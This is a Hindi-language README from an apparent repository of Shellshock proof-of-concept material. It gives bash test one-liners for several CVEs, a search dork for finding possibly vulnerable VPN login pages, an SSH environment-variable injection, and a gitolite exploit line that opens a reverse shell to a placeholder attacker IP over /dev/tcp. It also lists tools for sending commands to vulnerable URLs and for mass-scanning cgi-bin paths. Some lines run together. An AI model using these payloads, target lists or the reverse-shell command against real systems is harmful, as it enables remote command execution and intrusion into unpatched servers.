
#ShellShocker के लिए प्रूफ ऑफ कॉन्सेप्ट और संभावित लक्ष्यों का संग्रह
#ShellShocker के लिए प्रूफ ऑफ कॉन्सेप्ट और संभावित लक्ष्यों का संग्रह
विकिपीडिया लिंक: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details
यदि आपके पास और लिंक या अन्य संसाधन हैं, तो कृपया पुल रिक्वेस्ट सबमिट करें।
अटकलें:(गैर-पुष्ट, संभावित रूप से असुरक्षित)
inurl:inurl:/dana-na/auth/url_default/welcome.cgi
यदि आप इनमें से किसी के लिए PoCs जानते हैं, तो कृपया लिंक के साथ एक इश्यू या पुल रिक्वेस्ट सबमिट करें।
env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c idयदि असुरक्षित है, तो cwd में echo नामक एक फ़ाइल बनाएगा जिसमें दिनांक होगा
env X='() { (a)=>\' bash -c "echo date"; cat echobash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :यदि असुरक्षित है, तो segfault होगा
env X='() { x() { _; }; x() { _; } <<a; }' bash -c :LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_Xssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \" __ __\n / V \ \n _ | | |\n / \ | | |\n | | | | |\n | | | | |\n | |__| | |\n | | \ |___|___\n | \ |/ \ \n | | |______ |\n | | | |\n | \__' / |\n \ \( /\n \ /\n \| |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
__ __
/ V \
_ | | |
/ \ | | |
| | | | |
| | | | |
| |__| | |
| | \ |___|___
| \ |/ \
| | |______ |
| | | |
| \__' / |
\ \( /
\ /
\| |
shell_shocker.py - कमांड पास करने के लिए ज्ञात असुरक्षित URL के साथ इंटरैक्ट करने हेतु उपयोगी (User-Agent Method)w3af_shocker.py - w3af spider/shell_shock स्कैन चलाने की प्रक्रिया को स्वचालित करता है (User-Agent Method)shell_sprayer.py - किसी फ़ाइल में URL की सूची या एकल URL को cgi-bin संसाधनों की ज्ञात सूची के विरुद्ध जाँचता है (User-Agent Method)